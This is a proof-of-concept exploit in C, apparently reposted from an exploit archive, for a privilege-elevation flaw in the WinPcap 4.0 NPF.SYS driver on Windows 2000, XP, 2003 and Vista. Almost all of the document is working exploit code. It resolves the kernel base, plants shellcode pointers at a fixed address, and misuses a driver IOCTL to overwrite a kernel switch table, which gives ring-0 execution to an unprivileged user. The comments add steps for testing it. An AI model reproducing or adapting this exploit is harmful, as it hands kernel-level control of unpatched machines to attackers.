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WinPcap 4.0 NPF.SYS Privilege Elevation Vulnerability PoC Exploit
================================================================= WinPcap 4.0 NPF.SYS Privilege Elevation Vulnerability PoC Exploit ================================================================= /* WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit ------------------------------------------------------------- Affected software: (*) WinPcap versions affected (Confirmed) - WinPcap 4.0 and previous (*) WinPcap fixed version (stable) : WinPcap 4.0.1 Note : There was an error in the previous advisory, which tells WinPcap 4.1 is affected, in fact WinPcap 4.1 is the beta version. (*) Operating systems affected (Confirmed) - Windows 2000 SP4 (Both server and workstation) - Windows XP SP2 - Windows 2003 Server - Windows Vista !! Description: It's a well known issue that WinPcap security model allows non-administrator users to use its device driver. If they don't manually unload it after using tools such as Wireshark (ethereal), which unfortunatelly oftenly happens, this can lead to unwanted network traffic sniffing and now with the help of this exploit to kernel mode code execution ;-) Remarks: The exploit code is a PoC and was tested only against Windows XP SP2, with minor modifications (delta offsets and changing VirtualAlloc for NtAllocVirtualMemory due to base address restrictions in Windows Vista ) should work on all OSes commented above. To test the PoC, just pick any software which uses WinPcap like WireShark, then start to sniff in any iface and close it (so WinPcap device gets up ). Run the exploit code (as guest user if you want) you should hit an int 3 in kernel mode :-) Vulnerability discovered by: Mario Ballano Barcena, mballano[_at_]gmail.com http://www.48bits.com/ 24, April 2007 */ #define _CRT_SECURE_NO_DEPRECATE #include <windows.h> #include <stdio.h> #define IOCTL_BIOCGSTATS 9031 #define OUT_SIZE 0x10 #define NDRIVERS_LIST 100 enum OSes { OS_WXP=1, OS_W2K, OS_W2K3, OS_VISTA }; #define WXP_DELTA 0xA67FF; // SP2 Fully patched!! #define W2K_DELTA 0x0; #define W2K3_DELTA 0x0; #define WVISTA_DELTA 0x0; DWORD g_dwOsVersion = 0; LPVOID g_PatchAddress = NULL; LPBYTE g_WXP_PATCH_BYTES = "\x80\x83\xff\x2C\x75\x2F\x53\xE8\xE1\xA2\xF7\xFF\x89\x45\xDC\x85"; LPBYTE g_W2K_PATCH_BYTES = "\xCC\xCC\xCC"; LPBYTE g_W2K3_PATCH_BYTES = "\xCC\xCC\xCC"; LPBYTE g_WVISTA_PATCH_BYTES = "\xCC\xCC\xCC"; typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, DWORD , LPDWORD); typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, char *lpBaseName, DWORD nSize); typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD); BOOL GetNpfDevice (char *lpNpfDevice) { DWORD cb,lpType; char *lpList,*tmp; HKEY hkey; BOOL bRes = FALSE; lpList = malloc(0x1000); memset(lpList,0,0x1000); cb = 0x1000; if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\EAPOL\\Parameters\\General",0,KEY_READ,&hkey) == ERROR_SUCCESS ) { printf("AQUI"); if ( RegQueryValueExA( hkey, "InterfaceList", 0, &lpType, lpList, &cb) == ERROR_SUCCESS ) { strcpy(lpNpfDevice,"\\\\.\\NPF_"); while(*lpList && *lpList !='{') lpList++; tmp = lpList; while(*lpList && *(lpList) != '}') lpList ++; *(++lpList) = '\0'; strcat(lpNpfDevice,tmp); bRes = TRUE; } } free(lpList); if (!bRes) { printf("Cannot generate NPF Device Name :-( \n"); } return bRes; } LPVOID GetNtosBase (VOID) { HANDLE hLib; PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; DWORD lpcbNeeded,i; LPVOID NtosBase = NULL; LPVOID *lpImageBases = NULL; char lpBaseName[MAX_PATH]; if ( ( hLib = LoadLibraryA("psapi.dll")) && ( pEnumDeviceDrivers = (PENUMDEVICES) GetProcAddress(hLib,"EnumDeviceDrivers") ) && ( pGetDeviceDriverBaseName = (PGETDEVNAME) GetProcAddress(hLib,"GetDeviceDriverBaseNameA")) ) { lpImageBases = malloc( sizeof(LPVOID) * NDRIVERS_LIST ); pEnumDeviceDrivers(lpImageBases,sizeof(LPVOID) * NDRIVERS_LIST,&lpcbNeeded); if ( (lpcbNeeded / sizeof(LPVOID)) > NDRIVERS_LIST) { lpImageBases = realloc(lpImageBases,sizeof(LPVOID) * lpcbNeeded); pEnumDeviceDrivers(lpImageBases,lpcbNeeded,&lpcbNeeded); } for (i = 0; i < (lpcbNeeded / sizeof(LPVOID)) ; i++ ) { if ( pGetDeviceDriverBaseName(lpImageBases[i],lpBaseName,MAX_PATH) ) { printf ("%s\n",lpBaseName); if (!strcmp(lpBaseName,"ntoskrnl.exe")) { NtosBase = lpImageBases[i]; printf("NTOSKRNL Base found at %#p\n",NtosBase); break; } } } free(lpImageBases); } else { printf("Cannot Load psapi exports!\n"); } return NtosBase; } DWORD GetOSVersion (VOID) { OSVERSIONINFOA osvi; DWORD retval = 0; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); if ( GetVersionExA(&osvi) ) { if (osvi.dwMajorVersion == 5) { switch(osvi.dwMinorVersion) { case 0: retval = OS_W2K; break; case 1: retval = OS_WXP; break; case 2: retval = OS_W2K3; break; } } else if (osvi.dwMajorVersion == 6) { retval = OS_VISTA; } } g_dwOsVersion = retval; return retval; } DWORD GetNtosDelta (VOID) { DWORD retval = 0; switch(GetOSVersion()) { case OS_VISTA: printf("System identified as Windows Vista\n"); retval = WVISTA_DELTA; break; case OS_W2K: printf("System identified as Windows 2000\n"); retval = W2K_DELTA; break; case OS_W2K3: printf("System identified as Windows 2003\n"); retval = W2K3_DELTA; break; case OS_WXP: printf("System identified as Windows XP\n"); retval = WXP_DELTA; break; default: printf("Unidentified system!\n"); } return retval; } __declspec( naked ) void ShellCode (VOID) { // Just debug it, to check code execution ;-) __asm int 3; // The patch _should_ be done fastly ... that?s why we use global vars... switch(g_dwOsVersion) { case OS_VISTA: memcpy( g_PatchAddress, g_WVISTA_PATCH_BYTES,0x10); break; case OS_W2K: memcpy( g_PatchAddress, g_W2K_PATCH_BYTES,0x10); break; case OS_WXP: memcpy( g_PatchAddress, g_WXP_PATCH_BYTES,0x10); break; case OS_W2K3: memcpy( g_PatchAddress,g_W2K3_PATCH_BYTES,0x10); break; } // Go out without raising an exception ;-), indeed this is inside a SEH frame but ... wtf! :-) __asm { mov eax, [g_PatchAddress] inc eax push eax ret } } int main(int argc, char **argv) { HANDLE hDevice; LPVOID lpNtosSwitch; DWORD cb, delta; DWORD values[4]; LPVOID lpFakeTable; PQUERYSYSTEM NtQuerySystemInformation; char szNpfDevice[100]; BYTE QueryBuffer[0x24]; int i; NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(GetModuleHandleA("NTDLL.DLL"),"NtQuerySystemInformation"); printf ("Searching for a valid Interface ...\n"); if ( GetNpfDevice(szNpfDevice) ) { printf("NPF Device name generated! : %s\n",szNpfDevice); } else { printf("Cannot found any valid Interface!\n"); return 0; } if ( lpFakeTable = VirtualAlloc((LPVOID)0x570000, 0x20000, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) ) { printf("Memory allocated at %p\n",lpFakeTable); for ( i=0; i < ( 0x20000/sizeof(LPVOID) ); i++) { * ( (LPVOID *)lpFakeTable + i) = ShellCode; } printf("Memory mapping filled! ... \n"); } else { printf("Cannot allocate memory!\n"); return 0; } if ( (hDevice = CreateFileA(szNpfDevice, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL) ) != INVALID_HANDLE_VALUE ) { printf("Device %s succesfully opened!\n", szNpfDevice); if ( (lpNtosSwitch = GetNtosBase()) && ( delta = GetNtosDelta()) ) { g_PatchAddress = (LPVOID) ((LPBYTE) lpNtosSwitch + delta ); if ( DeviceIoControl(hDevice, IOCTL_BIOCGSTATS, (LPVOID)0,0, (LPVOID)values,OUT_SIZE, &cb, NULL) ) { printf("First time reading ... bytes returned %#x\n",cb); for (i = 0;i<4;i++) { printf ("OutBuffer[i] = %#x\n",values[i]); } } printf("Launching exploit ... \nOverwritting NTOSKRNL switch at -> %#p\n",g_PatchAddress); if ( DeviceIoControl(hDevice, IOCTL_BIOCGSTATS, (LPVOID)0,0, (LPVOID)g_PatchAddress,OUT_SIZE, &cb, NULL) ) { // Dirty trick .. NtQuerySystemInformation(0x15,QueryBuffer,sizeof(QueryBuffer), NULL); // Bye bye god mode! printf("We are back from ring0!\n"); } } } else { printf("Error: Cannot open device %s\n",szNpfDevice); } } # 0day.today [2024-11-15] #